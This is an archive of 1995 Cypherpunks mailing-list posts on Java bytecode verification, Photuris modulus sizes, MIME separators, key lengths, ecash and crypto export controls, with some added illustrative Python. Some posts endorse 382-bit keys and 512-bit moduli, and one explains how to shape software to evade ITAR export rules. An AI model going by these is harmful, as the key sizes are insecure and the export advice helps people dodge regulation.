| 2048 bit optional modulus and may even be a 4096-bit option if I can
| find one in reasonable time. There was going to be a 512-bit optional
| modulus but the group has reacted so strongly to it that I'm willing to
| withdraw it.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 13 Nov 1995 18:57:34 +0800
To: "Dietrich J. Kappe" <goedel@tezcat.com>
Subject: Java's verifier (was Re: Java insecurity - long - argumentative - you are warned.)
In-Reply-To: <v01510103acc4ce7ca31a@[206.1.161.4]>
Message-ID: <Pine.SOL.3.91.951108225902.10149A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995, Dietrich J. Kappe wrote:
> 
> This "checking," as any comp-sci undergrad will tell you, amounts to solving
> the halting problem for the java interpreter. While this is possible for a
[...]
> If you can write a checker that works in a reasonable amount of time, I'll
> write a turing machine simulator that'll do something nasty if the input
> machine halts. Then we'll split the fame and fortune for solving the 5 state

Yeah, but when you graduate, they let you in to the real secret- if a 
problem is NPC or Undecidable, either use some wild guesswork (oops,
heuristic), or try solving enough of the problem to be usable. 

The java verifier not only terminates, but runs in time linear to the 
size of the program to be verified. This is because the verifier doesn't 
really calculate whether a program is safe or not; it determines whether 
it can prove that the program is safe or not. It's possible to generate 
sequences of bytecodes that do not perform unsafe accesses, yet which are 
still rejected by the verifier because they violate its requirements.

The verifier can be considered to be an abstract interpretation over the 
depth and type-state of the operand stack. If the state is known before 
an instruction, it is always known after that instruction, and if there 
is more than one way to arrive at an instruction, each control path must 
arrive at that instruction with the same typestate.

Examples (not real JavaVM, but similar)

	load-int  <int>	== push an int onto the stack.
			before: ...
			after : ...,int

	load-float <flt>== push a float onto the stack
			before: ...
			after: ...,float
		
	add-int		== pop two ints off the stack, push sum onto stack
			before: ...,int,int
			after:  ...,int

	blt <val><add>  == pop an int off the stack, compare to val, and 
			      jump to address add if int is less than val

			before:  ...,int
			after:	 ...

	jmp <add>	== jump to address add
			before: ...
			after: ...

VALID
	load-int  1	; stack = (int)
	load-int  1	; stack = (int), (int)
	add-int		; stack = (int)

INVALID
	load-int 1	; stack = (int)
	load-float 1.0	; stack = (int) (float)
	add-int		; error, stack != (int), (int)

VALID
	load-int 2	;stack = (int)
	blt 1, a  	;stack = null
	load-int 3	; stack = (int)
	jmp b		; stack = (int)
    a	load-int 1	; stack = (int);
    b 	load-int 4	; stack = (int) (int)
	add-int		; stack = (int)

INVALID
	load-int 2	;stack = (int)
	blt 1, a  	;stack = null
	load-float 3	; stack = (float)
	jmp b		; stack = (float)	
    a	load-int 1	; stack = (int);	
    b 	load-int 4	; stack = ERROR (float || int)
	add-int		; stack = (int) ERROR

This last example is invalid, even though it's possible in this case to show
dynamically that the program will always arrive at b with an int on the 
stack; there are still two control paths that arrive at b, one with an
int, the other with a float.

I hope this makes sense

Simon
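
The typestate rules described in the message above, written out as a small verifier for its toy instruction set. This is an added example, not part of the original post and not the real Java verifier; the tuple encoding of instructions and the names `verify`, `rejected_at` and `VerifyError` are assumptions made for illustration.

```python
from collections import deque

class VerifyError(Exception):
    """Raised when the program cannot be proven type-safe."""
    def __init__(self, pc, message):
        super().__init__(f"pc {pc}: {message}")
        self.pc = pc

# opcode -> (types popped, types pushed); the rightmost entry is the stack top.
EFFECTS = {
    "load-int":   ((), ("int",)),
    "load-float": ((), ("float",)),
    "add-int":    (("int", "int"), ("int",)),
    "blt":        (("int",), ()),
    "jmp":        ((), ()),
}

def verify(program):
    """Abstractly interpret `program`, a list of (label, opcode, *operands).

    Returns the stack typestate before each instruction (None if unreachable).
    Operand values are never evaluated: only stack depth and types are tracked.
    Each instruction is queued at most once, so the pass is linear in the
    number of instructions plus control-flow edges.
    """
    if not program:
        return []
    labels = {ins[0]: pc for pc, ins in enumerate(program) if ins[0] is not None}
    before = [None] * len(program)
    before[0] = ()                       # execution starts with an empty stack
    work = deque([0])
    while work:
        pc = work.popleft()
        _label, op, *args = program[pc]
        if op not in EFFECTS:
            raise VerifyError(pc, f"unknown opcode {op!r}")
        pops, pushes = EFFECTS[op]
        stack = before[pc]
        keep = len(stack) - len(pops)
        if keep < 0 or stack[keep:] != pops:
            raise VerifyError(pc, f"{op} needs {pops} on top of stack, found {stack}")
        after = stack[:keep] + pushes

        # Successors: branch target first, then fall-through (jmp has none).
        target = args[0] if op == "jmp" else args[1] if op == "blt" else None
        succs = []
        if target is not None:
            if target not in labels:
                raise VerifyError(pc, f"undefined label {target!r}")
            succs.append(labels[target])
        if op != "jmp" and pc + 1 < len(program):
            succs.append(pc + 1)

        for s in succs:
            if before[s] is None:        # first path to reach s fixes its typestate
                before[s] = after
                work.append(s)
            elif before[s] != after:     # a second path must agree exactly
                raise VerifyError(s, f"paths arrive with {before[s]} and {after}")
    return before

def rejected_at(program):
    """Return the pc at which verification fails, or None if it is accepted."""
    try:
        verify(program)
    except VerifyError as err:
        return err.pc
    return None

# The four programs from the message, transcribed into the tuple encoding.
VALID_STRAIGHT = [(None, "load-int", 1), (None, "load-int", 1), (None, "add-int")]
INVALID_STRAIGHT = [(None, "load-int", 1), (None, "load-float", 1.0), (None, "add-int")]
VALID_BRANCH = [
    (None, "load-int", 2), (None, "blt", 1, "a"),
    (None, "load-int", 3), (None, "jmp", "b"),
    ("a", "load-int", 1), ("b", "load-int", 4), (None, "add-int"),
]
INVALID_BRANCH = [
    (None, "load-int", 2), (None, "blt", 1, "a"),
    (None, "load-float", 3), (None, "jmp", "b"),
    ("a", "load-int", 1), ("b", "load-int", 4), (None, "add-int"),
]
```

The last program is rejected at label `b` without the branch condition ever being evaluated, which is the conservative behaviour the message describes.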




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 9 Nov 1995 14:03:34 +0800
To: cypherpunks@toad.com
Subject: Virus-Blocker
Message-ID: <Pine.BSD.3.91.951109004245.1600C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
This item from 11 07 95 Edupage may be of interest to you: 
 
                      VIRUS-BLOCKER 
 
McAfee Associates has a new product called WebScan that 
identifies virus-tainted programs before they're downloaded 
and warns the user not to continue.  Security experts say 
WebScan is the first product that prevents viruses from in- 
fecting a computer to begin with, rather than attacking the 
problem after it's already occurred.  (Wall Street Journal 
6 Nov 95 B6) 
 
 
Cordially, 
 
Jim 
 
 
                         NOTE 
 
 
To subscribe to Edupage, send a message to: 
 
                 listproc@educom.unc.edu
 
In the body of the message type:
 
               subscribe edupage <your name> 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 14 Nov 1995 08:04:19 +0800
To: cypherpunks@toad.com
Subject: FBI Computer Chief
Message-ID: <Pine.BSD.3.91.951109004544.1600D-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
11 06 95 Computerworld 92 runs this "Briefs" item that 
may be of interest to you: 
 
              FBI names computer chief 
 
Federal Bureau of Investigation Director Louis J. Freeh 
last week announced the appointment of Carolyn G. Morris 
to head the FBI's Information Resource Division, which 
has 2,000 employees and a budget of $200 million. 
 
Morris will oversee all automation matters for the FBI 
and research and development for the new National Crime 
Information Center, a nationwide computerized system for 
law enforcement. 
 
 
Cordially, 
 
Jim 
 
 
 
 
                         NOTE 
 
 
     If you wish to subscribe to Computerworld, call 
 
                    1 800 669 1002 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 11 Nov 1995 05:50:02 +0800
To: Phil Karn <karn@qualcomm.com>
Subject: Re: Photuris Primality verification needed
Message-ID: <199511090913.BAA08368@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:47 PM 11/8/95 -0800, you wrote:
>>Including the provision for the 512 bit prime is *HARMFUL* and
>>*DANGEROUS*.  Export control is not really an issue here, because if
>>companies in the United States cannot provide secure networking,
>>there are other companies in the world that can.
>
>You've convinced me. I remove my proposal to include a recommended 512-bit
>modulus. The smallest standard modulus will remain 1024-bits.

If speed is really a concern, you could do a 640 or 768 bit modulus
("Hey, back when we wrote that, everybody assumed 640 would be enough for
everybody!"), or alternatively, let people use 512-bit private modulus values -
they're still short, but they're not a target if everybody's got their own
(which also means that popular applications shouldn't ship with a
built-in 512-bit prime; if Windows 97 did that, it'd be about the same
as putting it in the spec, so really short primes should probably require
user-generation, which may contradict the desire to use short numbers
to save time.)

One question is how to conveniently let the standard offer negotiation for
the modulus length and value without adding a lot of handshake steps
        -> WILL MODLENGTH 512PRIV 768 1024 1024ALT 2048
        <- DO MODLENGTH 512PRIV
        -> WILL MODULUS 87584327985734098750983475098347509837450983485843959843579083475098437509843750983
        <- 404 HEY, THAT'S NOT A STRONG PRIME!



#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 9 Nov 1995 17:37:44 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: "Industry Group Rebuffs U.S. on Encryption" (NYT 8Nov95, C3)
Message-ID: <199511090914.BAA08379@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:50 PM 11/8/95 -0800, you wrote:
>A group of 37 companies and trade and privacy associations sent a
>letter to Al Gore yesterday, complaining about Clipper-II and crypto
>export controls, and promising to send their own policy proposals
>to Congress and the Administration within six months.

We talked about this at dinner - what kind of proposals can industry offer, 
other than "128 bits and honest escrow" or "64 bits and no escrow"?
"128 bits now, with no escrow if you want any campaign contributions this fall"
or simply "get stuffed, we're all buying our crypto from Europe and including
it in all our products" ?

According to one of the newspaper articles, the gang of 37 is a Jerry Berman/CDT
coordination, so I don't expect one of the more radical answers from them,
but maybe they'll do the right thing.  The fact that Netscape is including
secure email in their Navigator next release can be a big lever pushing the
Feds toward giving up, and perhaps deserves some publicity once the 
release version is out the door.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 9 Nov 1995 17:31:52 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
Message-ID: <199511090914.BAA08391@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>"Perry E. Metzger" <perry@piermont.com> writes:
>>I suspect that as CPU speed exponentiates this will become less and
>>less of a problem. It doesn't especially worry me.

CPU speed in desktop or notebook computers isn't much problem;
CPU speed in smartcards is still an issue, and it may be
one or two more rounds of exponentiation before we'll see cards
that are both fast enough and really secure.

At 09:08 PM 11/8/95 -0800, Hal <hfinney@shell.portal.com> wrote:
>Consider, though, what happens in the current ecash system if it were
>used to charge a penny per page.  You would click on a link in your web
>browser to go to the new page.  It would set the GET request to the
>remote server as usual.

For penny-a-page on-line services, unless ecash transaction costs are
_radically_ cheap, it probably makes more sense for the service to sell its
own tokens, bought with (anonymous or non-anonymous) ecash, which you then
trade for pages.
No calculation required, just an on-line lookup for double-spending
and you don't get your page if you double-spend.  An alternative to them
picking the token numbers is for you to give them the numbers and them
to keep them in their database, but that's probably unlikely to be done
and doesn't really buy you much privacy.

If that's not anonymous enough for you (because your IP address could be
traced when you buy the tokens, and coordinated with them later),
use a packet laundry, or connect from your dialup access provider, 
which will tell the newspaper you're port43.server29.netcom.com or
something equally uninformative; or dial in from the public library or cafe.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Armadillo Remailer <remailer@armadillo.com>
Date: Mon, 13 Nov 1995 18:57:31 +0800
To: cypherpunks@toad.com
Subject: Worth of Crypto Consulting
Message-ID: <199511090735.BAA01846@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

 I have been doing some crypto consulting to small businesses for a while,
but it looks like I may be swimming with bigger fish in the near future. I
was wondering what "real" crypto consultants are getting these days. I will
be advising these people on the security of systems others are developing,
and helping them develop their own software, but I have no idea what the
market value of my time is.

Reply to the list, or send a message encrypted to the key below to
alt.anonymous.messages with the subject "anonymous consultant". 

        Many thanks,
           Anonymous Consultant






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Staedeli" <scottst@ionet.net>
Date: Thu, 9 Nov 1995 16:22:50 +0800
To: cypherpunks@toad.com
Subject: Pegasus Mail 2.20
Message-ID: <199511090804.CAA20494@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain


   The new beta release of Pegasus Mail (one of the better e-mail
apps available) has a new feature:


     --------------------------------------------------------------
    Runtime-loadable encryptor/decryptor modules for Pegasus Mail.

                         Pegasus Mail System, 
        Copyright (c) 1990-95, David Harris, All Rights Reserved
     --------------------------------------------------------------

The hot topic on everyone's lips is "privacy". And, as usual, the
computer industry is in the process of confusing and disrupting the issue
beyond recognition... We have factions all over the place each arguing
passionately for its own most beloved encryption scheme, and some of the
rhetoric is getting pretty heated.

Add to the proliferation of interests the USA's ridiculous export laws on
encryptors and the sum is trouble. As far as I can tell, encryption is
going through what seems to be an industry-standard cycle of chaos:
everyone suddenly realises there's a lack/opportunity/need and rushes to
promote the idea they like best; a small war develops during which the
users and peripheral developers are left bemused and bewildered amongst
the welter of extravagant claims and counter-claims, then eventually
(usually after two or three years of total pandemonium) the group with
the most clout (although not necessarily the best product) will win out
and become "the standard".

I've been through this rat race several times and have no desire whatever 
to go through it again; on the other hand, my USERS have very legitimate 
concerns about privacy. So what do I do? Easy - I pass the buck.

WinPMail v2.2 and later supports third-party, runtime loadable modules to
handle encryption and decryption of mail. A special mechanism has been
defined that allows Pegasus Mail to detect that a third party encryptor
has been used and to determine whether the matching decryptor is
available on the system. The built-in encryptor will remain available for
those sites who only need moderate levels of message security.  WinPMail
will define an open interface for third-party encryptors and it is then
up to other people to write the code. What I envisage actually happening
is people writing "shell interfaces" for WinPMail - i.e., modules that
take the calls I make and translate them into calls to other programs,
such as PGP or whatever, returning the result.

   Let the games begin.


--scottst@ionet.net------http://www.ionet.net/~scottst--
   >~<^xXx       | "The Internet is simply a means of 
        xX   #   | communication. Efforts to stop infor-
      (XXX) #    | mation by enjoining it are doomed to
    (XXXXXXX)    | failure in a free society."
DON'T TREAD ON ME|        -- Prof. Frank Tuerkheimer
========================================================
=========NSA trip phrase of the week: DEUTERIUM=========




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 9 Nov 1995 22:39:50 +0800
To: cypherpunks@toad.com
Subject: Re: Cybercensor in Singapore
Message-ID: <199511091425.GAA00125@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:15 PM 11/8/95 +0100, Anonymous wrote:
> The Government has blunted an uncensored
> Internet forum on Singapore political life by assembling
> a group of users who make sure the Government's views are
> represented.

That is censorship?

I visited the Singapore forum a few months ago --

When I visited Cuba (physically) everyone was visibly afraid.

When I visited the Singapore electronically, they were not
afraid.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 9 Nov 1995 23:44:42 +0800
To: cypherpunks@toad.com
Subject: Re: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <199511091528.HAA05703@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz <rsalz@osf.org> writes:

>I sure hope someone tells David Harris that his program is now export
>controlled.  From my reading of his message, it seemed like he thinks he
>"beat the system" because he didn't include actual crypto code.

Even if he were in the US, I would hope that no one told him that.  One
of the elements of the offense of violating the arms export control act
is that the violation be willful.  The exporter has to violate a known
legal duty not to export the item.  One of the reasons for this is simply
that the ITAR list is long and technical and average individuals cannot be
expected to know all its details.  This is mentioned in the Lizarraga
case, at approximately 541 F2d 828:

"Two features of 22 USC 1934 strongly indicate that Congress used the
term 'willful' to require a showing of specific intent.  First, the
statute prohibits exportation of items listed by administrative
regulation, not by the statute itself.  Second, upon referring to the
pertinent regulation, 22 CFR part 121, we find that the regulation
contains an exhaustive list of items including amphibious vehicles,
pressure-breathing suits, aerial cameras, 'privacy devices,' and
concealment equipment (including paints).  Unlike those substances which
are known generally to be controlled by government regulation, such as
heroin or like drugs, these items might be exported or imported
innocently.  Under such circumstances, it appears likely that Congress
would have wanted to require a voluntary, intentional violation of a
known legal duty not to export such items before predicating criminal
liability."

So in this case I think widespread publicity about the ITARs can be
considered harmful.  All those helpful people going around warning others
that they are exporting software are actually removing a defense against
charges of export.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Nov 1995 20:54:35 +0800
To: cypherpunks@toad.com
Subject: Coding-Export Limits Opposed
Message-ID: <199511091239.HAA07833@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, November 9, 1995, p. D4. 


   Coding-Export Limits Opposed

   The political right has joined the opposition to the
   Clinton Administration's proposed restriction on the export
   of data-coding systems.

   A group of 12 conservative organizations -- including the
   National Rifle Association, Americans for Tax Reform and
   the Competitive Enterprise Institute -- sent a letter
   yesterday to House Speaker Newt Gingrich protesting
   Administration efforts to limit the export of cryptographic
   software and hardware.

   Calling the proposal anti-consumer, anti-business and
   anti-progress, the groups urged Mr. Gingrich to support the
   relaxation of export controls. "The Administration's
   approach is the wrong policy for today's marketplace," the
   letter stated.

   The letter to Mr. Gingrich followed one sent on Tuesday to
   Vice President Al Gore from 37 corporate and public-policy
   groups, including the Microsoft Corporation and America
   Online Inc. The letter to Mr. Gore opposed Administration
   efforts to strike a compromise that would limit the
   strength of encryption software exports and require an
   escrowed code-key system, which would contain trapdoor
   access for American law enforcement agencies.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 13 Nov 1995 20:42:41 +0800
To: scottst@ionet.net
Subject: Re: Pegasus Mail
Message-ID: <9511091252.AA04699@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I sure hope someone tells David Harris that his program is now export
controlled.  From my reading of his message, it seemed like he thinks he
"beat the system" because he didn't include actual crypto code.

Software that says "plug your own crypto here" is considered an ancillary
device according to the ITAR.  Or, as I heard some NSA people call it,
"the classic 'crypto with a hole'."  Seems kinda silly that the hole is
the crypto, but hey that ancillary device clause, you just gotta love
it.

If Pegasus mail were written to support generic user-loadable content
transforms, that would be different.  But even then, you have to be careful
how that's done.  If you just did some global search-and-replace and came up
with "keyed compression" you wouldn't get past anyone.  But if you had an
opaque state block that the user modules could set/use/clear, and you
passed that along with your in/out buffers, then you'd be safe.  Of course,
they'd know what is really going on, but are powerless to prevent it.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Fri, 10 Nov 1995 00:43:57 +0800
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
Message-ID: <v03003b18acc7d3c77b54@[204.118.88.32]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:56 AM 11/9/95, Laurent Demailly wrote:
>I've waited a bit, but as nobody seems to have pointed out, you can
>definitely find a unique stream in a *single* pass (but maybe what you
>really want is no pass at all ?)

	engineering versus math.

	you can do it in zero passes, sort of.

	Generate a hefty pseudorandom number and convert it to a hefty
ascii string.  What are the odds that that string will appear in ANY kind
of data you are generating?  Low.  Measured in years and probably decades.

	As you do the mime encapsulation, also scan for a collision.  When
you get it (once every 20 years or so), abort the processing and start over.

d/

--------------------
Dave Crocker                                                +1 408 246 8253
Brandenburg Consulting                                fax:  +1 408 249 6205
675 Spruce Dr.                                     dcrocker@brandenburg.com
Sunnyvale, CA  94086 USA                         http://www.brandenburg.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 22:34:33 +0800
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511090147.RAA31271@kiwi.cs.berkeley.edu>
Message-ID: <199511091413.JAA15288@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Raph Levien writes:
> > I think you are fine if the odds of corrupting the message are less than 
> > the odds of getting hit by a falling meteor while running the program. 
> > In general there is little point in making any one part of the system 
> > many orders of magnitude more reliable than any other part.
> 
> I agree entirely. That's why my PGP key at school is 382 bits. It's a
> lot easier to compromise my machine than factor a 382 bit number.

On the other hand, it costs nothing by most people's standards to use
a 1024 bit key, so why not use one? I find that there is only a point
in using low security for anything in particular when there is a
perceivable cost to it -- if the cost is typing a different number
while doing key generation, I don't see why one should suffer the
tradeoff.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Fri, 10 Nov 1995 02:10:07 +0800
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
In-Reply-To: <9511091356.AA09725@hplyot.obspm.fr>
Message-ID: <199511091715.JAA12871@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Raph Levien writes:
>  >    On an unrelated topic... cypherpunks like to count bits, right?
>  > What is the correct number of pseudorandom bits to use in a MIME
>  > multipart separator? If the data has a line which matches the
>  > separator, the message is corrupted. Of course, if you can take
>  > multiple passes through the data, you can simply verify that it does
>    ***************
> No need !
>  > not contain a line which matches the separator. But if you're
>  > restricted to a single pass, then the only way to do it is to use a
>  > randomly generated separator.
> I've waited a bit, but as nobody seems to have pointed out, you can
> definitely find a unique stream in a *single* pass (but maybe what you
> really want is no pass at all ?)
> {you add a new random byte each time you find your sequence in the
> stream, and goes forward (as the previous separator was not in the
> "past" of the stream, you don't need to go back)}

Yes, that's a good strategy _if_ you're able to take multiple passes.
However, the separator must (of course) appear at the top of the multipart
message being assembled. Perhaps we don't agree on what "single pass"
means; I meant you could do the processing in a Unix pipe without
requiring storage proportional to the size of the data.

> What am I missing ? (anyway, see below)
> (I hope my answer is not as clueless as the "A-dice anonymous" one)

Not quite. As they say, "A-dice" is not merely clueless, but actually
clue-resistant.

>  >    I figure that 128 bits should _definitely_ be enough (that's what
>  > is in the new premail code now). Even 64 bits should ensure that it is
>  > unlikely that anyone will ever experience message corruption over the
>  > expected lifetime of premail. However, it makes me nervous. What do
>  > people think?
> 
> Isn't PGP encoded stream containing only base64 chars ? Why not use
> "====PGP part #===="  (as you can't have more than 2 = in a base 64,
> and only at the end anyway)
> or "@PGP part #" or whatever starting with a non base64 char ?

For PGP encrypted messages, I just use "+" as the boundary, as it is
guaranteed that a valid PGP/MIME multipart/encrypted message body will
never include the line "--+" or "--+--". For the longer separators, my
concern is multipart/signed messages.

> so "@" = 8 bits is my answer, do I win ;-) ?

I chose "+" instead of, say, "@" because it will survive EBCDIC gateways.
You might argue that this is worrying too much, but doing the right thing
here costs nothing, and may actually save somebody some trouble.

Raph
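
The two approaches discussed in this thread (a random separator of N bits, and scanning for a collision while encapsulating, then starting over), as an added example that is not code from premail or from any of the posters. The function names, the part representation and the retry limit are assumptions made for illustration.

```python
import secrets


class BoundaryCollision(Exception):
    """A body line begins with the delimiter, so the output so far is unusable."""


def new_boundary(bits=128):
    # Hex digits from a CSPRNG: body text written earlier cannot anticipate
    # the value, and the token is plain alphanumerics.
    return secrets.token_hex(bits // 8)


def collision_bound(bits, n_lines):
    """Union bound on the chance that any of n_lines body lines starts with
    the delimiter, for data that is independent of the boundary."""
    return min(1.0, n_lines * 2.0 ** -bits)


def encapsulate(parts, boundary):
    """Yield the multipart body line by line in one pass over `parts`, an
    iterable of (header_lines, body_lines). Nothing is buffered here."""
    delim = "--" + boundary
    for headers, lines in parts:
        yield delim
        yield from headers
        yield ""
        for line in lines:
            # Conservative check: the delimiter may not be a prefix of any line.
            if line.startswith(delim):
                raise BoundaryCollision(line)
            yield line
    yield delim + "--"


def build_message(make_parts, bits=128, max_tries=3, pick=new_boundary):
    """Scan while encapsulating; on a collision discard the output and start
    over with a fresh boundary. `make_parts` must be able to replay the
    input, which is what a pure pipe cannot do. The list() below stands in
    for an output that can still be thrown away."""
    for _ in range(max_tries):
        boundary = pick(bits)
        try:
            return boundary, list(encapsulate(make_parts(), boundary))
        except BoundaryCollision:
            continue
    raise RuntimeError("no collision-free boundary found")


if __name__ == "__main__":
    # Constructed workload: a billion body lines per separator size.
    for bits in (64, 128):
        print(bits, "bits:", collision_bound(bits, 10 ** 9))
```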






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Fri, 10 Nov 1995 02:20:49 +0800
To: perry@piermont.com
Subject: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091413.JAA15288@jekyll.piermont.com>
Message-ID: <199511091725.JAA17620@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> > I agree entirely. That's why my PGP key at school is 382 bits. It's a
> > lot easier to compromise my machine than factor a 382 bit number.
> 
> On the other hand, it costs nothing by most people's standards to use
> a 1024 bit key, so why not use one? I find that there is only a point
> in using low security for anything in particular when there is a
> perceivable cost to it -- if the cost is typing a different number
> while doing key generation, I don't see why one should suffer the
> tradeoff.

Perhaps it costs you "nothing," Perry, but not all of us have the
massively parallel 64-way interleaved banked memory nanosecond-latency
box you have on your desk.

Since RSA decryption is cubic in key size, it takes about twenty times
as long to sign or decrypt a message. Since latency-hiding (for example,
caching the decrypted session keys) is not widely implemented, the user
actually sees the difference.

For applications such as remailers, a 20-fold factor can make the
difference between smooth operation and totally hosing the machine.

Another reason to use small keys is to communicate the relative insecurity
of the machine to senders. A 382-bit key says, loud and clear, "don't send
sensitive or incriminating information using this key."

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 22:49:39 +0800
To: Phil Karn <karn@qualcomm.com>
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com>
Message-ID: <199511091430.JAA15324@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karn writes:
> >I don't know.  Maybe the right thing to do is require conforming
> >implementations to support a large modulus but include recommended
> >smaller moduli.  Then Alice can always force Bob to use the large
> >modulus but, if both agree, they can use something smaller from the
> >standard or even their own home-grown modulus.
> 
> Thanks. That's pretty much what we are doing -- requiring a particular
> 1024-bit modulus but recommending several others as options.

I think Brian is also suggesting that it would be good if people could
negotiate new and previously unheard of moduli if they wanted to.

Perry
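
The responder's side of the negotiation sketched in Bill Stewart's WILL/DO MODLENGTH message and discussed here, as an added example that is not Photuris code or anything the posters wrote. It assumes "strong prime" means a safe prime (p and (p-1)/2 both prime); the function names, the policy parameters, and the "DO MODULUS", "404 WRONG MODULUS LENGTH" and "404 NO ACCEPTABLE MODLENGTH" replies are hypothetical.

```python
import re
import secrets

# Known-good sample input: the 768-bit Oakley Group 1 modulus published in
# RFC 2409, a safe prime. It is not taken from the thread.
OAKLEY_768 = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A63A3620FFFFFFFFFFFFFFFF", 16)

TOKEN = re.compile(r"^(\d+)(PRIV|ALT)?$")           # e.g. 512PRIV, 1024ALT
NOT_STRONG = "404 HEY, THAT'S NOT A STRONG PRIME!"  # reply text from the sketch
SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_probable_prime(n, rounds=32):
    """Miller-Rabin with random bases after trial division."""
    if n < 2:
        return False
    for sp in SMALL_PRIMES:
        if n % sp == 0:
            return n == sp
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2      # base in [2, n-2]
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False                       # a witnesses that n is composite
    return True


def choose_modlength(offered, min_shared_bits=1024,
                     allow_short_private=False, min_private_bits=512):
    """Answer a 'WILL MODLENGTH ...' offer with the first acceptable token.
    A short modulus is accepted only when it is private to this pair of
    peers, never as a shared, built-in value."""
    for tok in offered:
        m = TOKEN.match(tok)
        if not m:
            continue
        bits, kind = int(m.group(1)), m.group(2)
        short_private_ok = (kind == "PRIV" and allow_short_private
                            and bits >= min_private_bits)
        if bits >= min_shared_bits or short_private_ok:
            return "DO MODLENGTH " + tok
    return "404 NO ACCEPTABLE MODLENGTH"


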